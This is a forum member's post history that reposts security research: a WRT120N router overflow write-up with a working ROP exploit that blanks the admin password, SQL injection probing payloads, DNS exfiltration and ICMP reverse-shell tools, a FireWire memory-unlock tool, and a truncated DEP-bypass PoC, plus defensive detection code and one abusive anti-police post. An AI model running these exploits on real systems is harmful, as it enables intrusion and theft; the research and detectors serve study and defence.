Nytro (Administrators)
Posts: 18715 | Days Won: 701

Everything posted by Nytro

  1. [h=1]WRT120N fprintf Stack Overflow[/h]

By Craig | February 19, 2014

With a good firmware disassembly and JTAG debug access to the WRT120N, it's time to start examining the code for more interesting bugs. As we've seen previously, the WRT120N runs a Real Time Operating System. For security, the RTOS's administrative web interface employs HTTP Basic authentication:

[Image: 401 Unauthorized]

Most of the web pages require authentication, but there are a handful of URLs that are explicitly allowed to bypass authentication:

bypass_file_list("/cgi-bin/login /images/ /login…");

[Image: Full list of bypass files]

Any request whose URL starts with one of these strings will be allowed without authentication, so they're a good place to start hunting for bugs. Some of these pages don't actually exist; others exist but their request handlers don't do anything (NULL subroutines). However, the /cgi/tmUnBlock.cgi page does have a handler that processes some user data:

[Image: cgi_tmUnBlock function handler]

The interesting bit of code to focus on is this:

```c
fprintf(request->socket, "Location %s\n\n", GetWebParam(cgi_handle, "TM_Block_URL"));
```

Although it at first appears benign, cgi_tmUnBlock's processing of the TM_Block_URL POST parameter is exploitable, thanks to a flaw in the fprintf implementation:

[Image: fprintf]

Yes, fprintf blindly vsprintf's the supplied format string and arguments to a local stack buffer of only 256 bytes. Respect yourself. Don't use sprintf.
This means that the user-supplied TM_Block_URL POST parameter will trigger a stack overflow in fprintf if it is larger than 246 (sizeof(buf) - strlen("Location: ")) bytes:

```sh
$ wget --post-data="period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL=$(perl -e 'print "A"x254')" http://192.168.1.1/cgi-bin/tmUnBlock.cgi
```

[Image: Stack trace of the crash]

A simple exploit would be to overwrite some critical piece of data in memory, say, the administrative password which is stored in memory at address 0x81544AF0:

[Image: Admin password at 0x81544AF0]

The administrative password is treated as a standard NULL terminated string, so if we can write even a single NULL byte at the beginning of this address, we'll be able to log in to the router with a blank password. We just have to make sure the system continues running normally after exploitation.

Looking at fprintf's epilogue, both the $ra and $s0 registers are restored from the stack, meaning that we can control both of those registers when we overflow the stack:

[Image: fprintf's function epilogue]

There's also this nifty piece of code at address 0x8031F634 that stores four NULL bytes from the $zero register to the address contained in the $s0 register:

[Image: First ROP gadget]

If we use the overflow to force fprintf to return to 0x8031F634 and overwrite $s0 with the address of the administrative password (0x81544AF0), then this code will:

  • Zero out the admin password
  • Return to the return address stored on the stack (we control the stack)
  • Add 16 to the stack pointer

This last point is actually a problem. We need the system to continue normally and not crash, but if we simply return to the cgi_tmUnBlock function like fprintf was supposed to, the stack pointer will be off by 16 bytes. Finding a useful MIPS ROP gadget that decrements the stack pointer back 16 bytes can be difficult, so we'll take a different approach.
Looking at the address where fprintf should have returned to cgi_tmUnblock, we see that all it is doing is restoring $ra, $s1 and $s0 from the stack, then returning and adding 0x60 to the stack pointer:

[Image: cgi_tmUnblock function epilogue]

We've already added 0x10 to the stack pointer, so if we can find a second ROP gadget that restores the appropriate saved values for $ra, $s1 and $s0 from the stack and adds 0x50 to the stack pointer, then that ROP gadget can be used to effectively replace cgi_tmUnblock's function epilogue. There aren't any obvious gadgets that do this directly, but there is a nice one at 0x803471B8 that is close:

[Image: Second ROP gadget]

This gadget only adds 0x10 to the stack pointer, but that's not a problem; we'll set up some additional stack frames that will force this ROP gadget to return to itself five times. On the fifth iteration, the original values of $ra, $s1 and $s0 that were passed to cgi_tmUnblock will be pulled off the stack, and our ROP gadget will return to cgi_tmUnblock's caller:

[Image: ROP stack frames and relevant registers]

With the register contents and stack having been properly restored, the system should continue running along as if nothing ever happened.
Here's some PoC code (download):

```python
# Python 2 script as posted (urllib2 module, print statement).
import sys
import urllib2

try:
    target = sys.argv[1]
except IndexError:
    print "Usage: %s <target ip>" % sys.argv[0]
    sys.exit(1)

url = target + '/cgi-bin/tmUnblock.cgi'
if '://' not in url:
    url = 'http://' + url

post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL="
post_data += "B" * 246               # Filler
post_data += "\x81\x54\x4A\xF0"      # $s0, address of admin password in memory
post_data += "\x80\x31\xF6\x34"      # $ra
post_data += "C" * 0x28              # Stack filler
post_data += "D" * 4                 # ROP 1 $s0, don't care
post_data += "\x80\x34\x71\xB8"      # ROP 1 $ra (address of ROP 2)
post_data += "E" * 8                 # Stack filler

for i in range(0, 4):
    post_data += "F" * 4             # ROP 2 $s0, don't care
    post_data += "G" * 4             # ROP 2 $s1, don't care
    post_data += "\x80\x34\x71\xB8"  # ROP 2 $ra (address of itself)
    post_data += "H" * (4-(3*(i/3))) # Stack filler; needs to be 4 bytes except for the
                                     # last stack frame where it needs to be 1 byte (to
                                     # account for the trailing "\n\n" and terminating
                                     # NULL byte)

try:
    req = urllib2.Request(url, post_data)
    res = urllib2.urlopen(req)
except urllib2.HTTPError as e:
    if e.code == 500:
        print "OK"
    else:
        print "Received unexpected server response:", str(e)
except KeyboardInterrupt:
    pass
```

[Image: Logging in with a blank password after exploitation]

Arbitrary code execution is also possible, but that's another post for another day.

Source: WRT120N fprintf Stack Overflow - /dev/ttyS0
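Added here as an example, not code from Craig's post or from the router firmware: a defender-side check that flags requests matching the overflow condition the post describes, namely a TM_Block_URL value longer than the 246-byte limit the post derives from sizeof(buf) - strlen("Location: "), or one carrying non-printable bytes (such as the embedded MIPS addresses). The sample requests, the function names and the hand-written form parser are my own; the parser exists because urllib.parse.parse_qs rejects a bytes body containing non-ASCII bytes.

```python
from urllib.parse import unquote_to_bytes

# Threshold derived in the post: sizeof(buf) - strlen("Location: ") = 256 - 10
TM_BLOCK_URL_MAX = 246
HANDLER_PATH = b"/cgi-bin/tmunblock.cgi"   # compared case-insensitively

def parse_form(body):
    """Minimal application/x-www-form-urlencoded parser that keeps raw bytes.
    (urllib.parse.parse_qs would raise on a bytes body with bytes >= 0x80.)"""
    fields = {}
    for pair in body.split(b"&"):
        if not pair:
            continue
        name, _, value = pair.partition(b"=")
        name = unquote_to_bytes(name.replace(b"+", b" "))
        fields.setdefault(name, []).append(unquote_to_bytes(value.replace(b"+", b" ")))
    return fields

def inspect_request(path, body):
    """Return a list of findings for one request (raw bytes path and POST body).
    An empty list means nothing about the request matches the overflow pattern."""
    findings = []
    if not path.lower().startswith(HANDLER_PATH):
        return findings
    for value in parse_form(body).get(b"TM_Block_URL", []):
        if len(value) > TM_BLOCK_URL_MAX:
            findings.append("TM_Block_URL is %d bytes, over the %d-byte limit of the stack buffer"
                            % (len(value), TM_BLOCK_URL_MAX))
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append("TM_Block_URL carries non-printable bytes (possible embedded addresses)")
    return findings

def scan(requests):
    """Run inspect_request over (path, body) pairs; return {index: findings} for hits only."""
    report = {}
    for i, (path, body) in enumerate(requests):
        hits = inspect_request(path, body)
        if hits:
            report[i] = hits
    return report

# Constructed sample traffic (not captured from a device)
PREFIX = b"period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL="
SAMPLE_REQUESTS = [
    (b"/cgi-bin/tmUnBlock.cgi", PREFIX + b"http://www.example.com/blocked"),   # ordinary use
    (b"/cgi-bin/tmUnBlock.cgi", PREFIX + b"A" * 254),                          # the post's wget crash test
    (b"/cgi-bin/tmUnblock.cgi", PREFIX + b"B" * 246 + b"\x81\x54\x4a\xf0"),   # overlong plus raw address bytes
    (b"/cgi-bin/login",         b"user=admin&pass=secret"),                    # other handler, not inspected
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_REQUESTS).items():
        print("request %d: %s" % (idx, "; ".join(hits)))
```

The length check alone catches the crash test from the post; the printable-bytes check is what separates a merely oversized URL from one that is shaped like a return-address overwrite.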
  2. Inception

Inception is a FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP-2 DMA. The tool can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.

Inception aims to provide a stable and easy way of performing intrusive and non-intrusive memory hacks on live computers using FireWire SBP-2 DMA. It is primarily intended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other ways to hack a machine that doesn't pack encryption. Inception is also useful for incident response teams and digital forensics experts when faced with live machines.

Inception's main mode works as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim. Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system's password authentication modules. Once found, the tool short circuits the code that is triggered if an incorrect password is entered. An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the nerdy equivalent of a memory inception. After running the tool you should be able to log into the victim machine using any password.
The in-memory patching is non-persistent, and a reboot will restore the normal password functionality. This contributes to a key property of Inception: it's stealthy.

You can also use Inception to elevate privileges on (almost) any machine you have physical access to. As the tool patches the inner authentication mechanism in the OS, you can elevate your privileges to Local Administrator / root by using the Windows runas or Linux/OS X sudo su -s commands.

As of version 0.3.1, it is able to unlock Windows 8.0-1, Windows 7 SP0-1, Vista SP0 and SP2, Windows XP SP2-3, Mac OS X Mavericks, Snow Leopard, Lion and Mountain Lion, Ubuntu 11.04, 11.10, 12.04, 12.10, 13.04, Linux Mint 11, 12 and 13 x86 and x64-bit machines. Signatures are added by request.

Requirements

Inception requires:

  • A unix-flavor operating system to perform the attack from:
    • Linux with the 'Juju' IEEE FireWire stack (Ubuntu 11 and higher and BackTrack 5 are known to work)
    • Mac OS X (via IOKit, not recommended as IOKit is notoriously buggy at the moment)
  • Python 3 (http://www.python.org)
  • libforensic1394 (https://freddie.witherden.org/tools/libforensic1394/)
  • A FireWire/Thunderbolt/ExpressCard/PC Card interface at both machines. If you don't have a native FireWire port, you can buy an adapter to hotplug one. The tool works over anything that expands the PCIe bus.

Download

The latest development version can always be fetched from GitHub.

Installation

You should be able to run the tool without any installation (except the dependencies) on Mac OS X and Linux operating systems. Please refer to the README file in libforensic1394 for installation of the libraries and FireWire pro-tips.

Source: Inception | Break & Enter
  3. VIOLENT PROTESTS in Kiev: 16 people were killed. Vitali Kliciko met with Ianukovici: "The President demanded the evacuation of Independence Square". Riot troops launched a new assault - LIVE VIDEO, PHOTO GALLERY - Mediafax
  4. ACAB. The police are to blame for this, the scumbags' slaves, shit eaters.
  5. Play Flappy Bird. Highscore: 1337. Challenge: change the highscore. (it's easy)
  6. [h=1]Insight on UNION query SQL injection[/h]

Last week I wrote about DBMS fingerprint through inband SQL injection (also known as UNION query SQL injection) assuming that a web application parameter is affected by such type of SQL injection threat. Today I will keep the same scenario to focus on the detection of the inband SQL injection vulnerability, which is a prerequisite to exploit it performing the DBMS fingerprint and any other possible attack.

There are mainly two techniques to detect if the vulnerable URL parameter is affected by an inband SQL injection vulnerability:

  • UNION ALL SELECT NULL
  • ORDER BY

UNION ALL SELECT NULL

The trick here is to perform the HTTP request taking advantage of the SQL syntax standard UNION ALL statement, appending to the vulnerable parameter the UNION ALL SELECT NULL statement N times as long as we do not get any DBMS error messages. Common DBMS error messages when the occurrences of NULL differ from the number of table columns are:

  • MySQL: The used SELECT statements have a different number of columns
  • PostgreSQL: each UNION query must have the same number of columns
  • Microsoft SQL Server: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists
  • Oracle: ORA-01789: query block has incorrect number of result columns

In our scenario at the first request (with only one NULL) we will get a DBMS error message (similar to one of the above) or a blank page (if the administrator configured the web server not to return error messages), so we will request http://example/index.php?id=1 UNION ALL SELECT NULL, NULL and we will get a normal page, without any DBMS error message: the remote SELECT query is on a table with two columns and we can append data through the UNION ALL SELECT statement.

ORDER BY

This technique consists in performing the HTTP request taking advantage of the SQL syntax standard ORDER BY statement.
Append to the vulnerable parameter the ORDER BY NUM statement, incrementing the number NUM as long as we do not get any DBMS error messages. Common DBMS error messages when the number NUM is greater than the number of table columns are:

  • MySQL: Unknown column 'NUM' in 'order clause'
  • PostgreSQL: ORDER BY position NUM is not in select list
  • Microsoft SQL Server: The ORDER BY position number NUM is out of range of the number of items in the select list
  • Oracle: ORA-01785: ORDER BY item must be the number of a SELECT-list expression

In our scenario at the first request (http://example/index.php?id=1 ORDER BY 1) we will not get the normal page (the query output will be sorted alphabetically based on the first table column values), so we will request http://example/index.php?id=1 ORDER BY 2 and we will get again a normal page. Now we already know that the table has two or more columns. Now requesting http://example/index.php?id=1 ORDER BY 3 we will get a DBMS error message (similar to one of the above) or a blank page (if the administrator configured the web server not to return error messages): the remote SELECT query is on a table with two columns and we can append data through the UNION ALL SELECT statement.

EXPLOITING

Both techniques are valid, but probably ORDER BY is more reliable on some custom DBMS/web application settings where, for example, NULL is not allowed as column type: quite a rare case, but it can happen.

Once we know how many columns there are in the table we have to check if the inband SQL injection is effectively visible (exploitable). In our scenario we can request http://example/index.php?id=1 UNION ALL SELECT NULL, '1234' and if the string 1234 appears in the HTML source code of the HTTP response page, we have an exploitable SQL injection. Remember to correctly encode with a DBMS CHAR() or similar function the strings to evade magic_quotes_gpc and some other security settings.
I will illustrate some possible security settings evasion techniques in a future post.

Now that we have an exploitable inband SQL injection we are ready to take advantage of this threat in our penetration test, for example performing a remote DBMS fingerprint [1] [2], usually the second step when exploiting this web applications vulnerability.

NOTES

  • The ALL is strongly advised to evade DISTINCT if present in the original web application SELECT query.
  • The column entries' data type must fit: usually NULL fits all DBMS data types. The point here is to find a string (depending on the remote DBMS: varchar, bpchar, etc.) where to inject our query. In our scenario, the remote DBMS being MySQL, it will work also in the first column even if it is an integer (int) because MySQL is not too restrictive in data type matching.
  • In case the web application SELECT statement is similar to "SELECT id, name FROM testtable WHERE id=" . $_GET['id'] . " LIMIT 0, 1" we can evade the SQL syntax LIMIT by commenting out our own injected query at the end, for instance requesting http://example/index.php?id=1 UNION ALL SELECT NULL, NULL-- where '--' starts a valid SQL comment in MySQL, Microsoft SQL Server and other DBMS.

Implementation in sqlmap code: inband SQL injection library

Posted 11th July 2007 by Bernardo Damele

Source: Bernardo Damele A. G.: Insight on UNION query SQL injection
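Added as an example, not code from Bernardo's post or from sqlmap: the concatenated query from the post's NOTES beside a parameterized version of the same query, both run against an in-memory SQLite table with the two columns of the scenario. SQLite stands in for the MySQL of the post (its error texts differ, but it also errors on ORDER BY past the column count, accepts "LIMIT 0, 1" and treats "--" as a comment). The table contents and function names are my own.

```python
import sqlite3

def make_db():
    """Constructed sample table (not from the post): two columns, as in the scenario."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE testtable (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO testtable VALUES (?, ?)", [(1, "admin"), (2, "guest")])
    return conn

def vulnerable_lookup(conn, user_id):
    """The post's PHP pattern: the request parameter is concatenated into the SQL text.
    Returns the rows, or None when the DBMS raised an error (the error or blank page)."""
    sql = "SELECT id, name FROM testtable WHERE id=" + user_id + " LIMIT 0, 1"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None

def safe_lookup(conn, user_id):
    """Same query with a bound parameter: the value stays data and never becomes syntax."""
    sql = "SELECT id, name FROM testtable WHERE id=? LIMIT 0, 1"
    return conn.execute(sql, (user_id,)).fetchall()

# Inputs taken from the post's scenario
NORMAL = "1"
ORDER_BY_OK = "1 ORDER BY 2"                             # within the column count
ORDER_BY_TOO_MANY = "1 ORDER BY 3"                       # one past the column count: DBMS error
UNION_LIMITED = "1 UNION ALL SELECT NULL, '1234'"        # the trailing LIMIT 0, 1 hides the injected row
UNION_COMMENTED = "1 UNION ALL SELECT NULL, '1234'-- "   # '--' comments the LIMIT away

if __name__ == "__main__":
    db = make_db()
    for label, value in [("normal", NORMAL), ("order by 2", ORDER_BY_OK),
                         ("order by 3", ORDER_BY_TOO_MANY), ("union", UNION_LIMITED),
                         ("union --", UNION_COMMENTED)]:
        print("%-11s vulnerable=%s  safe=%s" % (label, vulnerable_lookup(db, value), safe_lookup(db, value)))
```

The run shows the three observations the post relies on: ORDER BY 2 returns the normal row while ORDER BY 3 raises, the plain UNION is swallowed by LIMIT 0, 1, and the commented variant makes the injected '1234' row visible. The parameterized version returns the normal row for "1" and nothing at all for every injected value.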
  7. Data Retrieval over DNS in SQL Injection Attacks

Miroslav Štampar
AVL-AST d.o.o., Zagreb, Croatia
miroslav.stampar@avl.com

Abstract

This paper describes an advanced SQL injection technique where DNS resolution process is exploited for retrieval of malicious SQL query results. Resulting DNS requests are intercepted by attackers themselves at the controlled remote name server extracting valuable data. Open source SQL injection tool sqlmap [1] has been adjusted to automate this task. With modifications done, attackers are able to use this technique for fast and low-profile data retrieval, especially in cases where other standard ones fail.

Introduction

Exfiltration is a military term for removal of assets from within enemy territory by covert means. It now has an excellent modern usage in computing, meaning the illicit extraction of data from a system. The most covert data extraction method is considered to be the Domain Name Server (DNS) exfiltration [2]. This method can even be used on systems without a public network connection by resolving domain name queries outside the perimeter of trusted hosts through a series of internal and external name servers.

DNS is a relatively simple protocol. Both the query made by a DNS client and the corresponding response provided by a DNS server use the same basic DNS message format. With the exception of zone transfers, which use TCP for the sake of reliability, DNS messages are encapsulated within a UDP datagram. To someone monitoring a machine with a tool like Wireshark [3], a covert channel implemented over DNS would look like a series of little blips that flash in and out of existence [4]. The act of relaying DNS queries from secure systems to arbitrary internet-based name servers forms the basis of this uncontrolled data channel. Even if we assume that connections to public networks are not allowed, if the target host is able to resolve arbitrary domain names, data exfiltration is possible via forwarded DNS queries [5].
When other faster SQL injection (SQLi) data retrieval techniques fail, data is usually retrieved in bit-by-bit manner, which is a very noisy^1 and time consuming process. Thus, attackers will typically need tens of thousands of requests to retrieve content of a regular sized table. What is going to be described is the technique where attackers can retrieve results for malicious SQL queries (e.g. administrator password) by provoking specially crafted DNS requests from vulnerable Database Management System (DBMS) and intercepting those at the other end, transferring dozens of resulting characters per single iteration.

Download: http://arxiv.org/pdf/1303.3047.pdf
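The channel the paper describes leaves a trace on the resolver side: many distinct, encoded-looking leftmost labels under one zone, all from one client. Added as an example, not code from the paper or from sqlmap, here is detection logic run over a constructed resolver log in a made-up "time client qname qtype" format; the zone, client addresses, thresholds and the hex-encoded sample labels are my own choices, and the decoder at the end is the analyst-side step of recovering what such a channel carried.

```python
import math
import re
from collections import defaultdict

# Constructed resolver log (not real traffic): "<time> <client> <qname> <qtype>" per line.
# The leftmost labels of the exfil.example.net queries are hex-encoded strings.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 www.example.com A
10:00:02 10.0.0.5 mail.example.com MX
10:00:03 10.0.0.7 61646d696e3a5365637265743132.exfil.example.net A
10:00:04 10.0.0.7 726f6f743a746f6f7230312121.exfil.example.net A
10:00:05 10.0.0.7 7573657232.exfil.example.net A
10:00:06 10.0.0.7 7573657233.exfil.example.net A
10:00:07 10.0.0.9 cdn.images.example.org A
"""

HEX_LABEL = re.compile(r"^[0-9a-f]{8,}$")

def shannon_entropy(s):
    """Bits per character; ordinary hostname labels sit well below 3.5."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def looks_encoded(label, max_plain_len=24):
    """Heuristic: long, hex-only or high-entropy labels are unlikely to be hostnames."""
    return (HEX_LABEL.match(label) is not None
            or len(label) >= max_plain_len
            or shannon_entropy(label) >= 3.5)

def parse_log(text):
    """Yield (client, qname) pairs from the constructed log format."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4:
            yield parts[1], parts[2].lower().rstrip(".")

def analyze(text, zone_depth=3, min_unique=3):
    """Group queries by their last `zone_depth` labels and report the zones whose
    data labels (everything left of the zone) look like an encoded payload."""
    zones = defaultdict(lambda: {"clients": set(), "labels": set(), "encoded": 0})
    for client, qname in parse_log(text):
        labels = qname.split(".")
        if len(labels) <= zone_depth:
            continue                          # no room for a data label
        zone = ".".join(labels[-zone_depth:])
        data = ".".join(labels[:-zone_depth])
        z = zones[zone]
        if data not in z["labels"]:           # repeated queries for one name are cache misses, not new data
            z["labels"].add(data)
            z["encoded"] += looks_encoded(data)
        z["clients"].add(client)
    report = {}
    for zone, z in zones.items():
        if z["encoded"] >= min_unique:
            report[zone] = {"clients": sorted(z["clients"]),
                            "unique_labels": len(z["labels"]),
                            "encoded_labels": z["encoded"]}
    return report

def decode_hex_labels(text, zone):
    """Analyst helper: recover the strings a hex-encoding channel carried under `zone`."""
    out = []
    for _, qname in parse_log(text):
        if qname.endswith("." + zone):
            label = qname[: -len(zone) - 1].replace(".", "")
            if HEX_LABEL.match(label):
                out.append(bytes.fromhex(label).decode("latin-1"))
    return out

if __name__ == "__main__":
    for zone, stats in analyze(SAMPLE_LOG).items():
        print(zone, stats)
        print("  carried:", decode_hex_labels(SAMPLE_LOG, zone))
```

The per-zone grouping matters more than any single label test: one odd-looking label is noise, but several distinct ones under the same zone from the same client is the shape of a data channel.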
  8. [h=1]Reverse connection: ICMP shell[/h]

Background

Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios when you have owned a machine part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell. However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus of this post.

Surfing the Net I found two handy tools to get a reverse shell over ICMP:

  • soicmp - Developed in Python. Some useful features like the possibility to run the soicmp daemon on multiple ethernet interfaces simultaneously handling multiple client connections. Unfortunately it uses RAW_SOCKETS on both client and server. You'll need the highest system privileges (root / administrator) to successfully run it on both endpoints. This means that you need root privileges onto the target system that you have owned, which might not always be the case. It is cross-platform. Also, it looks to me that it is unmaintained as of 2006-10-26.
  • icmpshell - Developed in C. As per soicmp, it uses raw sockets on both the client and server side, therefore root privileges are required to use this program. It works on POSIX systems only, no support for Windows. Also, it looks to me that it is unmaintained as of 2002-02-06.

icmpsh

Last year a friend of mine coded a tool called icmpsh. It implements the reverse ICMP shell concept very well. The main advantage over the other open source tools is that it does not require administrative privileges to run onto the target machine. I spent some time playing with the tool and was immediately impressed. It is clean, easy and portable.
The slave (client) runs on the target machine; it is written in C and works on Windows only, whereas the master (server) can run on any platform as it has been implemented in C and Perl by Nico. I ported it to Python too. The reason for the Python port is that I wrapped it into sqlmap too. As of version 0.9 stable you can either establish the out-of-band connection via TCP with Metasploit or via ICMP with icmpsh - switch --os-pwn.

Features

  • Open source software - primarily coded by Nico, forked by me.
  • Client/server architecture.
  • The master is portable across any platform that can run either C, Perl or Python code.
  • The target system has to be Windows because the slave runs on that platform only for now.
  • The user running the slave on the target system does not require administrative privileges.

Example

[Image: Running icmpsh slave on target system (192.168.136.129) by specifying the master IP 192.168.136.1]

[Image: Running icmpsh master on attacker machine (192.168.136.1) and issuing two OS commands onto the target system (192.168.136.129)]

[Image: Response packet from icmpsh slave containing output of issued command whoami]

The forked tool can be found on my GitHub at https://github.com/inquisb/icmpsh. Feedback is always welcome!

Posted 15th April 2011 by Bernardo Damele

Source: Bernardo Damele A. G.: Reverse connection: ICMP shell
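The third screenshot above is the defender's handle on this channel: command output travels inside echo packets, so the payload of an echo request or reply no longer looks like what ping sends. Added as an example, not code from the post or from icmpsh, this parses ICMP echo packets built from constructed bytes, verifies the RFC 1071 checksum, and classifies the payload as a known ping pattern, printable text, or other. The Windows ping payload string and the iputils incrementing-byte pattern are standard ping behaviour; the sample packets and labels are my own.

```python
import struct

ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY = 8, 0
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"   # the 32 bytes Windows ping sends

def rfc1071_checksum(data):
    """One's-complement sum of 16-bit big-endian words, as ICMP uses."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_echo(icmp_type, ident, seq, payload):
    """Construct a sample ICMP echo packet (8-byte header + payload) with a valid checksum."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = rfc1071_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload

def parse_icmp(packet):
    """Split an ICMP packet into header fields and payload; a valid checksum sums to zero."""
    if len(packet) < 8:
        raise ValueError("ICMP packet shorter than its 8-byte header")
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": packet[8:], "checksum_ok": rfc1071_checksum(packet) == 0}

def is_iputils_pattern(payload):
    """Linux iputils ping: a timestamp, then bytes whose value equals their offset."""
    return len(payload) >= 24 and all(payload[i] == (i & 0xFF) for i in range(16, len(payload)))

def classify(packet):
    """'ping' for known ping payloads, 'text' for printable payloads shaped like
    command I/O, 'bad-checksum' for corrupted packets, 'other' for the rest."""
    p = parse_icmp(packet)
    if p["type"] not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return "other"
    if not p["checksum_ok"]:
        return "bad-checksum"
    data = p["payload"]
    if data == WINDOWS_PING_PAYLOAD or is_iputils_pattern(data):
        return "ping"
    if data and all(0x20 <= b < 0x7F or b in b"\r\n\t" for b in data):
        return "text"
    return "other"

# Constructed samples (no real captures)
LINUX_PAYLOAD = bytes(16) + bytes(range(16, 64))      # timestamp slot, then 0x10..0x3f
SAMPLES = {
    "windows_ping": build_echo(ICMP_ECHO_REQUEST, 1, 1, WINDOWS_PING_PAYLOAD),
    "linux_ping":   build_echo(ICMP_ECHO_REQUEST, 2, 1, LINUX_PAYLOAD),
    "shell_reply":  build_echo(ICMP_ECHO_REPLY, 3, 7, b"host\\user\r\n"),   # whoami-style output
}
CORRUPTED = SAMPLES["windows_ping"][:-1] + b"z"   # one payload byte changed: checksum fails

if __name__ == "__main__":
    for name, pkt in list(SAMPLES.items()) + [("corrupted", CORRUPTED)]:
        print("%-13s %s" % (name, classify(pkt)))
```

A payload that passes the checksum but matches neither ping pattern is the case worth alerting on; the checksum test is there so that truncated or corrupted captures are reported as such instead of as text.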
  9. DEP bypass with SetProcessDEPPolicy()

Data Execution Prevention (DEP) was introduced in Windows XP SP2 and is included in Windows XP Tablet PC Edition 2005, Windows Server 2003 Service Pack 1 and later, Windows Vista Service Pack 0 and later, and Windows Server 2008 Service Pack 0 and later, and all newer versions of Windows. Hardware-enforced DEP, for CPUs that support NX (AMD) or XD (Intel) bits, enforces non-executable pages; basically it marks the stack/part of the stack as non-executable, thus preventing the execution of arbitrary shellcode residing on the stack. When the processor/system has NX/XD support/enabled, then Windows DEP is hardware DEP. Compilers such as Visual Studio C++ offer a link flag (/NXCOMPAT) that will enable applications for DEP protection. It's enabled by default since it was introduced in Visual Studio 2005.

DEP can be circumvented in a number of ways by an attacker while exploiting a buffer overflow vulnerability to successfully achieve arbitrary command execution or, generally speaking, "successful shellcode run" when it resides on the stack. Some of these techniques are:

  • Return-to-libc with a call to WinExec(), widely covered in many papers and slides.
  • ZwProtectVirtualMemory, researched and explained on John's blog.
  • NtSetInformationProcess, initially researched by skape and Skywing and explained in an Uninformed article titled Bypassing Windows Hardware-enforced Data Execution Prevention. This is the widely known and used technique in most publicly available exploits that bypass hardware-enforced DEP.
  • SetProcessDEPPolicy, discussed in this blog post.

SetProcessDEPPolicy() API has been "silently" added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008. Michael Howard wrote a post on his blog back in early 2009 on how to use this function to set DEP for the current process from a developer perspective; I found it fairly well documented on MSDN too.
It has also been mentioned back in summer 2008 by Alexander Sotirov and Mark Dowd in their Black Hat USA presentation titled Bypassing Browser Memory Protections. Apart from these references, I did not find on the Internet any proof of concept demonstrating in practice how to abuse this API while exploiting a buffer overflow vulnerability to bypass hardware-enforced DEP, so I wrote the following proof of concept and hope it might be of help to other people too.

In my opinion this technique is the simplest among the ones I have mentioned: it does not require any stack or registers alignment to be in place before the function is called. The only drawback is that it is not supported on Windows 2003.

My test environment is a Windows XP Professional SP3 English updated on December 9, 2009 with DEP manually set to OptOut, so enabled for all processes except the ones that are put in the exception list, and the following proof of concept is not.

[Image: DEP manually set to OptOut on Windows XP with no exceptions]

The source code has been compiled with Microsoft Visual C++ 2008 Express Edition in Release mode with the default flags. This includes the /NXCOMPAT and /GS flags. Buffer Security Check (stack cookie, /GS flag) does not need to be bypassed in this specific case because the string buffer that we are going to overflow, buf, is 4 bytes long, so the compiler does not add the stack cookie to the useSetProcessDEPPolicy() function for performance reasons. Remember that the strict_gs_check pragma by default is turned off.

The following screenshot of Immunity Debugger shows that the shellcode (INT 3 instruction only in this PoC) has been successfully executed after DEP has been disabled abusing SetProcessDEPPolicy(). If DEP was not disabled, an Access Memory Violation would have been raised and the process would have been terminated.
Follows the proof of concept:

```c
/*
This is a proof of concept of buffer overflow exploitation with DEP bypass on
Windows XP Professional SP3 English updated on December 9, 2009 with DEP manually
set to OptOut, so enabled for all processes except the ones that are put in the
exception list, and this program is not.

This source has been compiled with Microsoft Visual C++ 2008 Express Edition in
Release mode with the default flags. This includes /NXCOMPAT and /GS.
Buffer Security Check (stack cookie, /GS flag) does not need to be bypassed
because the string buffer, buf, in this example is 4 bytes long, so the compiler
does not add the GS cookie to the useSetProcessDEPPolicy() function. Remember
that the strict_gs_check pragma by default is turned off.

References:
* 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008'
  by Michael Howard,
  http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
